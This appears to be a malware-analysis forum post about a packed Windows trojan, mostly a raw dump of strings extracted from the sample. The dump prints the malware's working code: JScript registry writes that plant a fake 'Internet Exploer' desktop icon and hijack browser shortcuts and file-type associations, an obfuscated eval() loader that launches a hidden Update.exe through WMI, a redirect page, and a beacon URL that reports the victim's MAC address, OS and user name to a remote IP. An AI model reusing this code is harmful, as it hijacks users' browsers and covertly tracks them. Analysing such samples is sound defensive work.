Not Arma, looks like scrambled UPX.
50+ MB of nothing, when the actual size of this trash is ~200 KB.
http://www.virustotal.com/file-scan/rep ... 1290316109
IconFile=C:\WINDOWS\Downloaded Program Files \\taobao.ico \\movie.ico \\mm.ico \\game.ico C:\WINDOWS\Downloaded Program Files\Update.exe .exe " "%s" C:\WINDOWS\Downloaded Program Files\mm.ico C:\WINDOWS\Downloaded Program Files\movie.ico C:\Program Files\Thunder\ComDlls\1143 C:\WINDOWS\system32\wscript.exe C:\Program Files\Thunder\Update.exe C:\Program Files\Thunder C:\Program Files\Internet Explorer\MUI C:\Program Files\Thunder\ComDlls\ .. . * \启动 Internet Explorer 浏览器.lnk \Internet Explorer.lnk \搜狗高速浏览器.lnk \世界之窗.lnk \Mozilla Firefox.lnk \360安全浏览器 3.lnk \腾讯TT.lnk \傲游浏览器2.lnk \傲游 3.lnk remove myself faile !
w try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\Open\\Command\\", "C:\\Program Files\\Internet Explorer\\Iexplore.exe http://www.788dh.com/","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\ShellFolder\\Attributes",10,"REG_DWORD");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\ShellFolder\\","","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\","Internet Exploer","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\КфРФ\\Command\\", "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\КфРФ\\", "КфРФ","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\Open\\", "ЙПНшЦчТі","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\D\\Command\\", "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\D\\", "Йѕіэ(&D)","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\","","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\DefaultIcon\\", "C:\\Program Files\\Internet Explorer\\Iexplore.exe","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\","Internet Exploer","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\ClassicStartMenu\\{871C5380-42A0-1069-A2EA-08002B30309D}",1,"REG_DWORD");}catch(e){}
try{P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\NewStartPanel\\{871C5380-42A0-1069-A2EA-08002B30309D}",1,"REG_DWORD");}catch(e){}
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('(3(){0 9,10;0 17=3(){0 65=5.22;0 21=10.61(5.22,1);0 7=21.45();0 24=/20(.*?)20/23;0 26=/19(.*?)19/23;0 2=\'\',11=\'\';27(24.25(7)){2=28.$1;2=2.44(/\\\\/49,"\\\\\\\\");0 50="";27(26.25(7)){11=28.$1;18{9.43(\'"\'+2+\'" \'+\' \'+11,1,51)}31(63){}}}};0 14=3(){9=4 6(\'5.15\');10=4 6(\'16.29\')};14();17()})();0 60=4 6("5.15");0 54=4 6("16.29");18{0 36="56:\\\\58\\\\57 62 55\\\\52.53";33(36)}31(59){};3 33(38){0 32=12;0 34=39("40:{37=35}!\\\\\\\\.\\\\41\\\\30:66");0 8=34.64();8.67=32;0 13="";0 42=39("40:{37=35}!\\\\\\\\.\\\\41\\\\30:48");42.47(38,46,8,13)};',10,68,'var||a|function|new|WScript|ActiveXObject|fc|objConfig|_ws|_sf|b||intProcessID|Init|Shell|Scripting|RunLnkFile|try|____|___|f|ScriptFullName|ig|_o1|test|_o2|if|RegExp|FileSystemObject|cimv2|catch|HIDDEN_WINDOW|CreateWin32|WMI|impersonate|path|impersonationLevel|_1|GetObject|winmgmts|root|objProcess|Run|replace|ReadAll|null|Create|Win32_Process|g|_fkurl|false|Update|exe|q|Files|C|Downloaded|WINDOWS|E|P|OpenTextFile|Program|e|SpawnInstance_|sfn|win32_processstartup|ShowWindow'.split('|'),0,{})) ____
//____ ___
//___ </html>
</body>
<body>
</head>
<title></title>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<meta http-equiv="Content-Language" content="zh-CN">
<head>
"> <html>
<meta http-equiv="refresh" content="0.1;url= lnk C:\Documents and Settings\Administrator\桌面\Internet Explorer.fon .fon .msm4 .clp .isi7 .dun isi3 .cer .isn3 .bkf .isn4 .aif .lnk .msn4 http://www.788dh.com fonfile\ScriptEngine fonfile\shell\open\command fonfile\DefaultIcon CRLfile\ScriptEngine CRLfile\shell\open\command CRLfile\DefaultIcon clpfile\ScriptEngine clpfile\shell\open\command clpfile\DefaultIcon dunfile\ScriptEngine dunfile\shell\open\command dunfile\DefaultIcon CERfile\ScriptEngine CERfile\shell\open\command CERfile\DefaultIcon msbackupfile\ScriptEngine msbackupfile\shell\open\command msbackupfile\DefaultIcon AIFFFile\ScriptEngine AIFFFile\shell\open\command AIFFFile\DefaultIcon fonfile CRLfile clpfile dunfile CERfile msbackupfile AIFFFile \..\..\Program Files\Internet Explorer\iexplore.exe Software\Microsoft\Internet Explorer\Main\Frist http://58.218.198.119:8080/count.asp?mac=%s&os=%s&flag=%s&user=%s %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x Microsoft Win32s Microsoft Windows Millennium Edition Microsoft Windows 98 Microsoft Windows 95 Microsoft Windows NT Microsoft Windows 2000 Microsoft Windows Server 2003 Microsoft Windows XP %02x-%02x-%02x-%02x-%02x %02x-%02x-%02x-%02x-%02x-%02x